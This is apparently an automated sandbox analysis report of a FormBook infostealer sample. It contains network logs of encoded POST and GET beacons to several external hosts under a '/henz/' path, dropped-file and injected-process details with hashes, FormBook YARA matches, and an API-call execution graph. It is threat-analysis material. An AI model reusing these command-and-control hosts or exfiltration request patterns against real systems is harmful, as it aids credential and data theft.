                                                Data Raw: 34 68 71 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 6e 33 53 33 41 36 71 70 49 52 49 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63in3S3A6qpIRIDNF~GIA).
                                                Nov 30, 2022 01:25:39.220068932 CET | 117 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:39 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                6 | 192.168.2.4 | 49701 | 155.159.61.221 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:25:41.267249107 CET | 118 | OUT | GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.patrickguarte.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:41.493326902 CET | 118 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:41 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                7 | 192.168.2.4 | 49702 | 2.57.90.16 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:25:54.144684076 CET | 120 | OUT | POST /henz/ HTTP/1.1
                                                Host: www.brennancorps.info
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.brennancorps.info
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.brennancorps.info/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 34 68 71 3d 43 36 36 7a 31 2d 46 33 50 30 6d 6f 65 62 4e 7a 7e 51 71 50 73 58 72 32 61 6b 65 42 31 62 43 41 6e 53 55 34 33 45 57 56 36 47 38 51 75 69 53 77 4b 78 55 5a 6d 32 77 6a 55 6a 77 6b 7a 66 75 54 6e 37 57 47 44 32 64 6d 59 52 64 38 52 4a 6a 62 62 50 55 4e 6b 69 49 58 75 42 41 6c 68 39 74 51 6c 72 42 51 56 52 4c 62 6e 50 6f 79 46 49 65 43 56 69 73 32 79 4d 59 73 55 32 49 66 73 4b 69 4b 66 63 31 64 35 65 4e 5f 61 39 53 2d 44 4c 72 4a 54 30 77 6f 41 6a 42 53 51 4a 37 68 6c 41 56 34 61 4f 37 69 65 4e 44 32 59 71 6a 41 33 6d 47 31 67 77 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 4hq=C66z1-F3P0moebNz~QqPsXr2akeB1bCAnSU43EWV6G8QuiSwKxUZm2wjUjwkzfuTn7WGD2dmYRd8RJjbbPUNkiIXuBAlh9tQlrBQVRLbnPoyFIeCVis2yMYsU2IfsKiKfc1d5eN_a9S-DLrJT0woAjBSQJ7hlAV4aO7ieND2YqjA3mG1gw).
                                                Nov 30, 2022 01:25:54.177197933 CET | 120 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:54 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                8 | 192.168.2.4 | 49703 | 2.57.90.16 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:25:56.204452991 CET | 121 | OUT | GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1
                                                Host: www.brennancorps.info
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 30, 2022 01:25:56.240652084 CET | 121 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Wed, 30 Nov 2022 00:25:56 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                9 | 192.168.2.4 | 49704 | 192.185.35.86 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 30, 2022 01:26:01.502938986 CET | 122 | OUT | POST /henz/ HTTP/1.1
                                                Host: www.lopezmodeling.com
                                                Connection: close
                                                Content-Length: 185
                                                Cache-Control: no-cache
                                                Origin: http://www.lopezmodeling.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.lopezmodeling.com/henz/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Ascii: 4hq=QrvaC9aiV2M6(euVsPXCLu8QHu2RH4(r292tLaK32wlQdv8DOlAclj6M8El2juqYmCEQ5tEj9SIjhWOFC0T6phUxcYudx-9V~ODr5SNRlgezQf(enhzuT4BZs0I17zsCphkEtzpK16qTA7an1ntUTmk4T7rAA55KkExEsYMndzQxzD~ORw).
                                                Nov 30, 2022 01:26:01.644731998 CET | 124 | IN | HTTP/1.1 404 Not Found
                                                Date: Wed, 30 Nov 2022 00:26:01 GMT
                                                Server: Apache
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                Set-Cookie: PHPSESSID=c570c0e56952311d05e6ddd9a42f969d; path=/; HttpOnly
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Content-Length: 869
                                                Content-Type: text/html; charset=UTF-8



                                                Target ID:0
                                                Start time:01:24:07
                                                Start date:30/11/2022
                                                Path:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Lc8xQv8iZY.exe
                                                Imagebase:0x400000
                                                File size:278807 bytes
                                                MD5 hash:30571D64C9A9ED267159FA941A20840C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                Target ID:1
                                                Start time:01:24:08
                                                Start date:30/11/2022
                                                Path:C:\Users\user\AppData\Local\Temp\hvbvmxm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
                                                Imagebase:0x400000
                                                File size:125952 bytes
                                                MD5 hash:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 54%, ReversingLabs
                                                Reputation:low

                                                Target ID:2
                                                Start time:01:24:08
                                                Start date:30/11/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7c72c0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:3
                                                Start time:01:24:09
                                                Start date:30/11/2022
                                                Path:C:\Users\user\AppData\Local\Temp\hvbvmxm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
                                                Imagebase:0x400000
                                                File size:125952 bytes
                                                MD5 hash:1EEBBBD92B2C0C60F896FF8DCBCEDCAA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Target ID:4
                                                Start time:01:24:13
                                                Start date:30/11/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff618f60000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:5
                                                Start time:01:24:44
                                                Start date:30/11/2022
                                                Path:C:\Windows\SysWOW64\help.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\help.exe
                                                Imagebase:0x110000
                                                File size:10240 bytes
                                                MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate


                                                  Execution Graph

                                                  Execution Coverage:15%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:22.9%
                                                  Total number of Nodes:1272
                                                  Total number of Limit Nodes:22
404fe7 25 API calls 3217->3205 3218 404fe7 25 API calls 3218->3220 3220->3205 3220->3217 3220->3218 3241 405a49 3220->3241 3267 405cfb lstrcpynA 3221->3267 3223 4058e0 3224 405882 4 API calls 3223->3224 3225 4058e6 3224->3225 3226 405634 3225->3226 3227 405f5d 5 API calls 3225->3227 3226->3182 3226->3183 3233 4058f6 3227->3233 3228 405921 lstrlenA 3229 40592c 3228->3229 3228->3233 3230 4057ee 3 API calls 3229->3230 3232 405931 GetFileAttributesA 3230->3232 3231 405ff6 2 API calls 3231->3233 3232->3226 3233->3226 3233->3228 3233->3231 3234 405835 2 API calls 3233->3234 3234->3228 3235->3186 3237 405842 3236->3237 3238 405853 3237->3238 3239 405847 CharPrevA 3237->3239 3238->3190 3239->3237 3239->3238 3240->3200 3268 406087 GetModuleHandleA 3241->3268 3244 405ab1 GetShortPathNameA 3246 405ac6 3244->3246 3247 405ba6 3244->3247 3246->3247 3249 405ace wsprintfA 3246->3249 3247->3220 3248 405a95 CloseHandle GetShortPathNameA 3248->3247 3250 405aa9 3248->3250 3251 405d1d 18 API calls 3249->3251 3250->3244 3250->3247 3252 405af6 3251->3252 3275 4059d2 GetFileAttributesA CreateFileA 3252->3275 3254 405b03 3254->3247 3255 405b12 GetFileSize GlobalAlloc 3254->3255 3256 405b30 ReadFile 3255->3256 3257 405b9f CloseHandle 3255->3257 3256->3257 3258 405b44 3256->3258 3257->3247 3258->3257 3276 405947 lstrlenA 3258->3276 3261 405bb3 3263 405947 4 API calls 3261->3263 3262 405b59 3281 405cfb lstrcpynA 3262->3281 3265 405b67 3263->3265 3266 405b7a SetFilePointer WriteFile GlobalFree 3265->3266 3266->3257 3267->3223 3269 4060a3 3268->3269 3270 4060ad GetProcAddress 3268->3270 3282 40601d GetSystemDirectoryA 3269->3282 3273 405a54 3270->3273 3272 4060a9 3272->3270 3272->3273 3273->3244 3273->3247 3274 4059d2 GetFileAttributesA CreateFileA 3273->3274 3274->3248 3275->3254 3277 40597d lstrlenA 3276->3277 3278 40595b lstrcmpiA 3277->3278 3280 405987 3277->3280 3279 405974 CharNextA 3278->3279 3278->3280 3279->3277 3280->3261 3280->3262 3281->3265 3283 40603f wsprintfA LoadLibraryA 
3282->3283 3283->3272 3670 4025e2 3671 4025e9 3670->3671 3673 40284e 3670->3673 3672 4029ef 18 API calls 3671->3672 3674 4025f4 3672->3674 3675 4025fb SetFilePointer 3674->3675 3675->3673 3676 40260b 3675->3676 3678 405c59 wsprintfA 3676->3678 3678->3673 3679 403ae4 3680 403c37 3679->3680 3681 403afc 3679->3681 3682 403c88 3680->3682 3683 403c48 GetDlgItem GetDlgItem 3680->3683 3681->3680 3684 403b08 3681->3684 3688 403ce2 3682->3688 3696 401389 2 API calls 3682->3696 3764 403fb7 3683->3764 3685 403b13 SetWindowPos 3684->3685 3686 403b26 3684->3686 3685->3686 3689 403b43 3686->3689 3690 403b2b ShowWindow 3686->3690 3692 404003 SendMessageA 3688->3692 3738 403c32 3688->3738 3693 403b65 3689->3693 3694 403b4b DestroyWindow 3689->3694 3690->3689 3691 403c72 SetClassLongA 3695 40140b 2 API calls 3691->3695 3736 403cf4 3692->3736 3697 403b6a SetWindowLongA 3693->3697 3698 403b7b 3693->3698 3746 403f40 3694->3746 3695->3682 3699 403cba 3696->3699 3697->3738 3702 403b87 GetDlgItem 3698->3702 3715 403bf2 3698->3715 3699->3688 3703 403cbe SendMessageA 3699->3703 3700 40140b 2 API calls 3700->3736 3701 403f42 DestroyWindow EndDialog 3701->3746 3705 403b9a SendMessageA IsWindowEnabled 3702->3705 3708 403bb7 3702->3708 3703->3738 3704 403f71 ShowWindow 3704->3738 3705->3708 3705->3738 3707 405d1d 18 API calls 3707->3736 3709 403bc4 3708->3709 3710 403bd7 3708->3710 3711 403c0b SendMessageA 3708->3711 3719 403bbc 3708->3719 3709->3711 3709->3719 3713 403bf4 3710->3713 3714 403bdf 3710->3714 3711->3715 3717 40140b 2 API calls 3713->3717 3716 40140b 2 API calls 3714->3716 3750 40401e 3715->3750 3716->3719 3717->3719 3718 403fb7 19 API calls 3718->3736 3719->3715 3747 403f90 3719->3747 3720 403fb7 19 API calls 3721 403d6f GetDlgItem 3720->3721 3722 403d84 3721->3722 3723 403d8c ShowWindow EnableWindow 3721->3723 3722->3723 3767 403fd9 EnableWindow 3723->3767 3725 403db6 EnableWindow 3728 403dca 3725->3728 3726 403dcf GetSystemMenu EnableMenuItem SendMessageA 3727 403dff 
SendMessageA 3726->3727 3726->3728 3727->3728 3728->3726 3768 403fec SendMessageA 3728->3768 3769 405cfb lstrcpynA 3728->3769 3731 403e2d lstrlenA 3732 405d1d 18 API calls 3731->3732 3733 403e3e SetWindowTextA 3732->3733 3734 401389 2 API calls 3733->3734 3734->3736 3735 403e82 DestroyWindow 3737 403e9c CreateDialogParamA 3735->3737 3735->3746 3736->3700 3736->3701 3736->3707 3736->3718 3736->3720 3736->3735 3736->3738 3739 403ecf 3737->3739 3737->3746 3740 403fb7 19 API calls 3739->3740 3741 403eda GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3740->3741 3742 401389 2 API calls 3741->3742 3743 403f20 3742->3743 3743->3738 3744 403f28 ShowWindow 3743->3744 3745 404003 SendMessageA 3744->3745 3745->3746 3746->3704 3746->3738 3748 403f97 3747->3748 3749 403f9d SendMessageA 3747->3749 3748->3749 3749->3715 3751 4040bf 3750->3751 3752 404036 GetWindowLongA 3750->3752 3751->3738 3752->3751 3753 404047 3752->3753 3754 404056 GetSysColor 3753->3754 3755 404059 3753->3755 3754->3755 3756 404069 SetBkMode 3755->3756 3757 40405f SetTextColor 3755->3757 3758 404081 GetSysColor 3756->3758 3759 404087 3756->3759 3757->3756 3758->3759 3760 404098 3759->3760 3761 40408e SetBkColor 3759->3761 3760->3751 3762 4040b2 CreateBrushIndirect 3760->3762 3763 4040ab DeleteObject 3760->3763 3761->3760 3762->3751 3763->3762 3765 405d1d 18 API calls 3764->3765 3766 403fc2 SetDlgItemTextA 3765->3766 3766->3691 3767->3725 3768->3728 3769->3731 3770 401ae5 3771 402a0c 18 API calls 3770->3771 3772 401aec 3771->3772 3773 4029ef 18 API calls 3772->3773 3774 401af5 wsprintfA 3773->3774 3775 4028a1 3774->3775 3776 4019e6 3777 402a0c 18 API calls 3776->3777 3778 4019ef ExpandEnvironmentStringsA 3777->3778 3779 401a03 3778->3779 3781 401a16 3778->3781 3780 401a08 lstrcmpA 3779->3780 3779->3781 3780->3781 3782 401f67 3783 401f79 3782->3783 3792 402028 3782->3792 3784 402a0c 18 API calls 3783->3784 3785 401f80 3784->3785 3787 402a0c 18 API calls 3785->3787 3786 401423 25 API calls 3793 40217f 
3786->3793 3788 401f89 3787->3788 3789 401f91 GetModuleHandleA 3788->3789 3790 401f9e LoadLibraryExA 3788->3790 3789->3790 3791 401fae GetProcAddress 3789->3791 3790->3791 3790->3792 3794 401ffb 3791->3794 3795 401fbe 3791->3795 3792->3786 3796 404fe7 25 API calls 3794->3796 3797 401423 25 API calls 3795->3797 3798 401fce 3795->3798 3796->3798 3797->3798 3798->3793 3799 40201c FreeLibrary 3798->3799 3799->3793 3814 401c6d 3815 4029ef 18 API calls 3814->3815 3816 401c73 IsWindow 3815->3816 3817 4019d6 3816->3817 3818 4014f0 SetForegroundWindow 3819 4028a1 3818->3819 3827 4043f5 3828 404421 3827->3828 3829 404432 3827->3829 3888 4055a0 GetDlgItemTextA 3828->3888 3830 40443e GetDlgItem 3829->3830 3837 40449d 3829->3837 3832 404452 3830->3832 3836 404466 SetWindowTextA 3832->3836 3840 405882 4 API calls 3832->3840 3833 404581 3886 40472b 3833->3886 3890 4055a0 GetDlgItemTextA 3833->3890 3834 40442c 3835 405f5d 5 API calls 3834->3835 3835->3829 3841 403fb7 19 API calls 3836->3841 3837->3833 3842 405d1d 18 API calls 3837->3842 3837->3886 3839 40401e 8 API calls 3844 40473f 3839->3844 3845 40445c 3840->3845 3846 404482 3841->3846 3847 404511 SHBrowseForFolderA 3842->3847 3843 4045b1 3848 4058cf 18 API calls 3843->3848 3845->3836 3852 4057ee 3 API calls 3845->3852 3849 403fb7 19 API calls 3846->3849 3847->3833 3850 404529 CoTaskMemFree 3847->3850 3851 4045b7 3848->3851 3853 404490 3849->3853 3854 4057ee 3 API calls 3850->3854 3891 405cfb lstrcpynA 3851->3891 3852->3836 3889 403fec SendMessageA 3853->3889 3857 404536 3854->3857 3859 40456d SetDlgItemTextA 3857->3859 3863 405d1d 18 API calls 3857->3863 3858 404496 3861 406087 5 API calls 3858->3861 3859->3833 3860 4045ce 3862 406087 5 API calls 3860->3862 3861->3837 3864 4045d5 3862->3864 3865 404555 lstrcmpiA 3863->3865 3866 404611 3864->3866 3874 405835 2 API calls 3864->3874 3875 404669 3864->3875 3865->3859 3867 404566 lstrcatA 3865->3867 3892 405cfb lstrcpynA 3866->3892 3867->3859 3869 404618 3870 405882 4 API calls 
3869->3870 3871 40461e GetDiskFreeSpaceA 3870->3871 3873 404642 MulDiv 3871->3873 3871->3875 3873->3875 3874->3864 3876 4046da 3875->3876 3893 404871 3875->3893 3878 4046fd 3876->3878 3880 40140b 2 API calls 3876->3880 3904 403fd9 EnableWindow 3878->3904 3880->3878 3881 4046dc SetDlgItemTextA 3881->3876 3882 4046cc 3896 4047ac 3882->3896 3885 404719 3885->3886 3905 40438a 3885->3905 3886->3839 3888->3834 3889->3858 3890->3843 3891->3860 3892->3869 3894 4047ac 21 API calls 3893->3894 3895 4046c7 3894->3895 3895->3881 3895->3882 3897 4047c2 3896->3897 3898 405d1d 18 API calls 3897->3898 3899 404826 3898->3899 3900 405d1d 18 API calls 3899->3900 3901 404831 3900->3901 3902 405d1d 18 API calls 3901->3902 3903 404847 lstrlenA wsprintfA SetDlgItemTextA 3902->3903 3903->3876 3904->3885 3906 404398 3905->3906 3907 40439d SendMessageA 3905->3907 3906->3907 3907->3886 3908 4016fa 3909 402a0c 18 API calls 3908->3909 3910 401701 SearchPathA 3909->3910 3911 40171c 3910->3911 3913 4027cc 3910->3913 3911->3913 3914 405cfb lstrcpynA 3911->3914 3914->3913 3915 40287c SendMessageA 3916 4028a1 3915->3916 3917 402896 InvalidateRect 3915->3917 3917->3916 3918 40227d 3919 402a0c 18 API calls 3918->3919 3920 40228b 3919->3920 3921 402a0c 18 API calls 3920->3921 3922 402294 3921->3922 3923 402a0c 18 API calls 3922->3923 3924 40229e GetPrivateProfileStringA 3923->3924 3925 4014fe 3926 401506 3925->3926 3928 401519 3925->3928 3927 4029ef 18 API calls 3926->3927 3927->3928 3936 4040ff 3937 404115 3936->3937 3942 404222 3936->3942 3939 403fb7 19 API calls 3937->3939 3938 404291 3940 404365 3938->3940 3941 40429b GetDlgItem 3938->3941 3943 40416b 3939->3943 3946 40401e 8 API calls 3940->3946 3947 4042b1 3941->3947 3948 404323 3941->3948 3942->3938 3942->3940 3944 404266 GetDlgItem SendMessageA 3942->3944 3945 403fb7 19 API calls 3943->3945 3967 403fd9 EnableWindow 3944->3967 3950 404178 CheckDlgButton 3945->3950 3951 404360 3946->3951 3947->3948 3952 4042d7 6 API calls 3947->3952 3948->3940 
